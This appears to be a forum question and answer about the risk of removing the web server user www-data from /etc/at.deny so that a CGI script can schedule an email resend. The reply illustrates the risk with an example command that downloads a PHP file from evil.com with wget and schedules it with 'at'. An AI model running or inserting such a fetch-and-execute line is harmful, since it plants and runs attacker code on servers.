I have a cgi script that is resending an email on a failed attempt 5-10 minutes after a user accesses a page. My thought was to do this using the at command from a python call (os.system("at now + 5 minutes <<< ' python resend.py data'")). Testing revealed:
$ sudo su www-data
$ at now
You do not have permission to use at.
$
What sort of grief am I exposing myself to if I remove user 'www-data' from the /etc/at.deny file?
by making that proposed change, you are allowing the user apache runs as to execute jobs in the future, at a later time.... i dunno this is possible, but if you where able to subvert a webserver to execute serverside something like
exec("cd /tmp && wget http://evil.com/evil.php && at laterdate /tmp/evil.php")
this would exec that downloaded php script, at a later time.
its basically one time cron, and to be honest, i usually disable it, in favor of jenkins.
